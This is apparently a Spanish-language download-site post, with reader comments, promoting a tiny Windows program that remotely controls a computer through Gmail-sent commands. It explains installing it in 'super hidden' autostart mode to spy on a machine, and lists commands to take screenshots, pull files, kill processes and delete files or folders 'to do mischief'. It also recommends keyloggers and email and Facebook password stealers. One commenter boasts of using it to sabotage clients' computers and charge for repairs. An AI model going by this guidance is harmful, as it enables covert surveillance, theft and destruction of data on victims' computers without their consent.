Truco como espiar y manejar un computador a través

Truco como espiar y manejar un computador a través

Con este programa si lo aprendes a dominar puedes llegar a tomar capturas de pantalla de un equipo remoto, apagar, reiniciar, enviar mensajes ocultos, abrir paginas web y mas de una forma fácil, automática y oculta todo a través de tu cuenta de gmail, manos a la obra.

Características y usos del Truco como espiar y manejar un computador a través de una cuenta gmail fácilmente.

- Funciona únicamente con Windows 8, 7, vista y xp
- Si tienes xp o vista debes tener instalado .net 4 o superior
- Debes tener una cuenta activa y funcionado de gmail.
- Este programa, es gratis, seguro y libre de virus
- Portable y fácil de usar.
- Descarga gratis el programa para controlar un computador a través de internet de forma fácil y con gmail.
- Descomprime con winrar o tu compresor favorito
- Ahora ejecuta el programa 40 K es diminuto

- En su primera ejecución te pedirá un contraseña, esta es la que usaremos siempre para comunicarnos remotamente con el equipo. NO pongas la de tu correo simplemente una frase.

- Ahora nos toca configurar la cuenta de gmail, aquí ponemos nuestros datos de acceso a gmail.
En el email de respuesta coloca el de gmail u otro, es para recibir los informes y capturas de pantalla.

- Ahora en activa el intervalo de chequeo 5 segundos esta bien.

- Para terminar puede activar el autoinicio con Windows, cada vez que lo prendas el programa cargara hay dos formas ?h que es minimizado o ?i que es súper oculto, el caso que espíes algún equipo.

- Listo ahora la parte mas importante desde otro equipo sin importar la distancia entra a tu gmail vía web.

- Escríbete un correo a ti mismo y en el sujeto escribes lo siguiente: tucontraseña();comando();
- Ejemplo: mi contraseña para el programa NO la del Gmail OJO la que me pido al comienzo es holacomostas();shutdown(); ?el comando de apagar?

- Envió el correo y el equipo el próximo chequeo ejecutara la tarea.

Comandos a ejecutar:

NOTA: primero debes ir con tu clave mira el video

comando: screenshot(); ?toma una captura de pantalla y te la envía por correo?
comando: shutdown(); ?apaga el equipo con alerta de 1 minuto?
comando: logoff(); ?cierra la sesión actual del usuario?
comando: restart(); ?reinicia el computador remoto?
comando: abort(); ?cancela el apagado?
comando: run(program,parameters); ?abre un archivo, música , pagina o imagen? run(http://blog.hola.net);
comando: play(path); ?abre un archivo de audio?
comando: msg(text); ?muestra un mensaje en la pantalla? msg( saludos desde aqui un programa gratis y muy útil);
comando: exit(); ?cierra el programa?
comando: beep(); ?atiba sonidos de la cpu?
comando: forceshut(); ?apaga el equipo de forma fulminante?
comando: processes(); ? envía listado de procesos y programas abiertos?
ping(www.google.com); ?ejecuta el comando ping a un dominio o ip?
kill(PID); ?cierra un programa?
getlist(c:); ?realiza un dir a un directorio?
getfile(path); ?saca un archivo y lo envía por correo max 25 megas? getfile(c:fotosx.jpg); ?envía fotosx.jpg a tu correo?
comando: delfile(path); ?borra un archivo en el equipo local?
comando: deldir(path); ?borrar una carpeta entera, bueno para hacer maldades?
comando: uptime(); ?tiempo que lleva prendido el equipo?

Solución de problemas:

Como cambio la clave del programa y borro los ajuste de fabrica, desinstalar : simplemente borra todos los archivos de este portable y comienza de 0.
No puedo ejecutar comandos: verifica firewall, antivirus y claves del gmail y programa.

Asi de fácil puedes acompañar este programa con los keyloggers gratis para Windows y con el programa para sacar claves de correo y los programas para sacar claves de Facebook.

Enlaces De Descarga
Truco como espiar y manejar un computador a través
5 Puntos Score: 5/10
Visitas: 2539 Favoritos: 35
Ver los usuarios que votaron...
20 Comentarios Truco como espiar y manejar un computador a través
jeje parece interesante pero no confio supongo que me quedare con la duda  
bueno, si tienes un enemigo y quieres hacerle una broma
lo intentare, si es que me sale
Cita et1999: Mostrar
pero en este caso espiar o cerrarle la m?
@truchita si, pero es algo para divertise, jajajajaja, mentiras, puedes ayudarle a la otra persona como manejar la pc
Admitamoslo: la gente es da?
@truchita si, si le pones veneno para matar a la otra persona
si, o un clavo oxidado en el medio de la miga, al morder se te rompe un diente, te ahogas y te lo trag?
Me sirve para mis clientes , como yo arreglo compuradores les hago algunos trucos y me llamaran diciendo que el pc se apaga y asi se los arreglo y les cobro, ya que se los dejo tan buenos que me llaman pocas veces jejejje gracias.
@truchita si, esa gente es mala
Que bonito troyano  
si logro que funcione ..mmm muy bueno...  
troyano? @bierco que dices acerca de eso amigo,siempre e confiado en tus aportes.....
Probado y funcionando, muy buen programa, lo recomiendo  
una pregunta el otro tiene que tener instalado el programa para que funcione saludos

wow !
pocas veces se ven estos programas !
Saludos cordiales!!!!!
Para dejar un comentario Registrate! o.. eres ya usuario? Accede!